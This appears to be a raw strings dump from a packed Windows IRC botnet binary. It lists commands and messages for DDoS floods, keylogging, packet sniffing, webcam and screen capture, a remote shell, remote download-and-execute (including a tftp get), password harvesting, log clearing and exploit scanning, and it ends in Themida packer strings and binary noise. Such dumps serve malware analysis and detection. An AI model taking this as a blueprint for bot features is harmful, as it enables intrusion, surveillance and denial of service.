Couldn't resolve hostname. Lookup: %s -> %s. (processes.p Failed to terminate process: %s (processes.p Process killed: %s (processes.p Failed to terminate process ID: %s (processes.p Process killed ID: %s Deleted '%s'. Send File: %s, User: %s. Failed to start connection thread, error: <%d>. Command sent. Client not open. Commands: %s Error sending to remote shell. Read file failed: %s Read file complete: %s (capture.p Invalid parameters for amateur video capture. (capture.p Error while capturing amateur video from webcam. (capture.p Amateur video saved to: %s. (capture.p Invalid parameters for webcam capture. (capture.p Error while capturing from webcam. (capture.p Webcam capture saved to: %s. (capture.p Driver list complete. (capture.p Driver #%d - %s - %s. drivers (capture.p No filename specified for screen capture. (capture.p Error while capturing screen. (capture.p Screen capture saved to: %s. Gethost: %s. Unable to extract Gethost command. Gethost: %s, Command: %s Alias added: %s. Privmsg: %s: %s. Action: %s: %s. Mode change: %s (clones.p (clones.p (clones.p Repeat not allowed in command line: %s Repeat: %s (update.p Bot ID must be different than current running process. (update.p Failed to start download thread, error: <%d>. (update.p Downloading update from: %s. Commands: %s Couldn't execute file. (findfile.p Failed to start search thread, error: <%d>. (findfile.p Searching for file: %s in: %s. Rename: '%s' to: '%s'. Invalid flood time must be greater than 0. Failed to start flood thread, error: <%d>. Flooding: (%s) for %s seconds. (clones.p Failed to start clone thread, error: <%d>. (clones.p Created on %s:%d, in channel %s. Failed to start flood thread, error: <%d>. Flooding: (%s:%s) for %s seconds. Failed to start flood thread, error: <%d>. Flooding: (%s:%s) for %s seconds. (download.p Failed to start transfer thread, error: <%d>. (download.p Downloading URL: %s to: %s. (redirect.p Failed to start redirection thread, error: <%d>. (redirect.p TCP redirect created from: %s:%d to: %s:%d. (portscan.p Failed to start scan thread, error: <%d>. (portscan.p Port scan started: %s:%d with delay: %d(ms). ACTION %s Failed to start scan thread, error: <%d>. %s Exploitation started on %s:%d waiting %d seconds for %d minutes using %d threads. Sequential Failed to start scan, no IP specified. Already %d scanning threads. Too many specified. Failed to start flood thread, error: <%d>. Sending %d packets to: %s. Packet size: %d, Delay: %d(ms). ICMP.dll not available Failed to start flood thread, error: <%d>. Sending %d pings to %s. packet size: %d, timeout: %d(ms). Invalid flood time must be greater than 0. Failed to start flood thread, error: <%d>. %s %s flooding: (%s:%s) for %s seconds. Spoofed Invalid flood type specified. Uploading file: %s to: %s failed. Uploading file: %s to: %s %s\%i%i%i.dll File not found: %s. ftp.upload util.hcon util.httpcon 15,14nzm 15(email 15 Message sent to %s. helo $rndnick mail from: <%s> rcpt to: <%s> subject: %s util.email ddos.tcpf ddos.tcpflood ddos.pingf ddos.pingflood ddos.udpf ddos.udpflood advscan clone.ac clone.action clone.pm clone.privmsg root.portscan daemon.rd daemon.redirect download.wg download.wget ddos.synf ddos.synflood clone.start clone.make ddos.icmp com.rename findfile com.execute download.up download.update irc.delay irc.repeat clone.part clone.join clone.ni clone.nick clone.mode clone.ra clone.raw irc.mode irc.cycle irc.action irc.privmsg irc.addalias irc.gethost com.capture Command unknown. No message specified. User list failed. User list completed. Share list failed. Share list completed. Service list failed. Service list completed. Failed to load advapi32.dll or netapi32.dll. (keylog.p Failed to start logging thread, error: <%d>. (keylog.p Key logger active. (keylog.p Already running. (keylog.p No key logger thread found. (keylog.p Key logger stopped. (%d thread(s) stopped.) com.keylog No Carnivore thread found. Carnivore stopped. (%d thread(s) stopped.) Failed to start sniffer thread, error: <%d>. Carnivore packet sniffer active. Already running. com.readfile mirc.cmd irc.visit com.filelist com.delete com.pkid com.prockillid com.killprocname irc.setserve com.open irc.prefix clone.rn clone.rndnick clone.quit threads.k threads.kill irc.part irc.join irc.nick scanall com.findpass daemon.tf.on daemon.tftp.on daemon.web.on daemon.httpd.on daemon.rl.on daemon.rlogin.on root.cip root.currentip util.fdns util.flushdns util.farp util.flusharp com.getclip Login list complete. -[Login List]- Remote shell com.ocmd.off com.ocmd com.opencmd com.testdlls com.driveinfo com.uptime com.harvest com.procs irc.rem0ve com.sysinfo (supersyn.p Failed to start flood thread, error: <%d>. (supersyn.p Flooding: (%s:%s) for %s seconds. ddos.supersyn com.netinfo util.clg util.clearlog irc.aliases threads.l threads.list Failed to reboot system. Rebooting system. com.rebewt irc.status irc.quit irc.disconnect irc.reconnect root.stats Exploitation root.stop lockdown.stop clone.off com.ps.off com.procs.off util.ff.off util.findfile.off daemon.tftp.off Ping flood ddos.ping.off UDP flood ddos.udp.off Syn flood ddos.syn.off DDoS flood ddos.off TCP redirect proxy.redirect.off Log list daemon.web.off daemon.rlogin.off proxy.socks4.off proxy.s4.on proxy.socks4.on lockdown.off lockdown.on irc.version irc.logout irc.rndnick $rndnick Chat failed by unauthorized user: %s. Chat already active with user: %s. Failed to start chat thread, error: <%d>. Chat from user: %s. Receive file: '%s' failed from unauthorized user: %s. Failed to start transfer thread, error: <%d>. NOTICE %s : %s has just versioned me. NOTICE %s : VERSION %s VERSION Receive file: '%s' from user: %s. User: %s logged out. Joined channel: %s. NOTICE %s :%s User %s logged out. (processes.p Process list failed. (processes.p Process list completed. (processes.p Listing processes: (rlogind.p User logged out: <%s@%s>. (rlogind.p Error: SessionRun(): <%d>. (rlogind.p User logged in: <%s@%s>. Permission denied (rlogind.p Error: getpeername(): <%d>. (rlogind.p Protocol string too long. (rlogind.p Login rejected, Remote user: <%s@%s>. (rlogind.p Error: server failed, returned: <%d>. (rlogind.p Failed to start client thread, error: <%d>. (rlogind.p Client connection from IP: %s:%d, Server thread: %d. (rlogind.p Ready and waiting for incoming connections. (rlogind.p Failed to install control-C handler, error: <%d>. (rlogind.p Error: WSAStartup(): <%d>. country (portscan.p IP: %s Port: %d is open. (portscan.p Scanning IP: %s, Port: %d. (secure.p Netapi32.dll couldn't be loaded. (secure.p Network shares deleted. (secure.p Failed to delete '%S' share. (secure.p Share '%S' deleted. (secure.p Failed to delete '%s' share. (secure.p Share '%s' deleted. (secure.p Advapi32.dll couldn't be loaded. (secure.p Failed to open IPC$ Restriction registry key. (secure.p Restricted access to the IPC$ Share. (secure.p Failed to restrict access to the IPC$ Share. restrictanonymous (secure.p Failed to open DCOM registry key. (secure.p DCOM disabled. (secure.p Disable DCOM failed. EnableDCOM (secure.p Network shares added. (secure.p Failed to add '%s' share. (secure.p Share '%s' added. (secure.p Failed to open IPC$ restriction registry key. (secure.p Unrestricted access to the IPC$ Share. (secure.p Failed to unrestrict access to the IPC$ Share. (secure.p DCOM enabled. (secure.p Enable DCOM failed. (rlogind.p WaitForMultipleObjects error: <%d>. (rlogind.p Failed to create ReadShell session thread, error: <%d>. (rlogind.p Failed to execute shell. (rlogind.p Failed to create shell stdin pipe, error: <%d>. (rlogind.p Failed to create shell stdout pipe, error: <%d>. (rlogind.p Failed to execute shell, error: <%d>. (rlogind.p SessionReadShellThread exited, error: <%ld>. tftp.exe -i get -[Thread List]- %s: No %s thread found. %s: %s stopped. (%d thread(s) stopped.) .?AVexception@@ .?AVlogic_error@std@@ .?AVout_of_range@std@@ .?AVlength_error@std@@ .?AVtype_info@@ C:\m_unpacker\packed.exe abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ KERNEL32.dll CreateFileA ExitProcess COMCTL32.dll InitCommonControls Themida qheK81m rxxvT$U~OD< InjXWV/c h0iwF!TR ftnzB-X5 LA)P9FxX VYwVaXO |R1_y1cW~ tDvjpB6 c(p0FsbCTR:L+ ard)6 B>Ve 'WcIA@cx)0 ak69hFu h9SI3Xur q6~g0ag&x \d4c0pLO 61eD9fk sFlB4DV + M0QLHHJ C:\m_unpacker RestartApp.exe 333333333333 C:\WINDOWS\System32\ADVAPI32.dll Themida EFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ WLNumDLLsProt Exit Status = %d 4$sFU9XR .Y34$14$34$ fXfGfOf $VRhBYp#ZV 8df]fUfh _34$14$34$ fUfSfWf _34$14$34$ $PhgXU_X 34$14$34$\V _34$14$34$ 34$14$34$\h3$ $PUWhK/D4_G $14$34$14$V 6USER32.dll ADVAPI32.dll NTDLL.dll 4cdiqO1 x_RZ0e*S Software\WinLicense CheckIN XprotExit CheckOUT WinLicenseVersion WinLicenseDriverVersion WinLicenseInstance ProcOUT ExitOUT /bugcheck2 /bugcheck /forcerun /bugcheckfull /showcode /showcode2 /showinstance /getwlstatus /logstatus /dumpstatus /checkprotection 3Cannot write oreans.vxd Make sure that this file is not being used by another program. \Oreans.vxd !This program cannot be run in DOS mode. XPROTVXD XPROTVXD 1vsR2vsR3vsR XPROTVXD_DDB ADVAPI32.DLL OpenSCManagerA CreateServiceA StartServiceA GetNativeSystemInfo OpenServiceA DeleteService CloseServiceHandle ControlService oreans32.sys oreansx64.sys oreans32 \\.\oreans32 \\.\Global\oreans32 oreansx64 \\.\Global\oreansx64 SYSTEMROOT %s\system32\drivers\%s %s\syswow64\drivers\%s %s\system32\drivers\oreans32.sys 3Cannot Update oreans.sys driver. Please, make sure that you have administrator's permits the first time that you are going to run this program. 3Cannot open oreans.vxd driver. Make sure that oreans.vxd is not open by another program. 3SecureEngine driver cannot be updated because there are some programs using it. You need to close those programs or restart your computer. Restart now? \\.\Oreans.vxd %s\Oreans.vxd XprotEvent SeShutdownPrivilege CreateEvent API Error while extraction the driver GetEnvironmentVariable API Error while extraction the driver OpenSCManager API Error while extraction the driver CreateService API Error while extraction the driver CloseServiceHandle API Error while extraction the driver OpenService API Error while extraction the driver StartService API Error while extraction the driver APIC error: Cannot find Processors Control Blocks. Please, contact info@oreans.com for this error 3Sorry, this application cannot run under a Virtual Machine Exception Information Please, send the following codes to info@oreans.com. Thank you. (press CTRL+C on this window to copy to clipboard) Version = %s CheckIN = %d CheckOUT = %d ProcIN = %d ProcOUT = %d ExitIN = %d ExitOUT = %d LMRZ0er 4IFSMGR VKD VMM VWIN32 VXDLDR 3An internal exception occured (Address: 0x%x) Please, contact support@oreans.com. Thank you!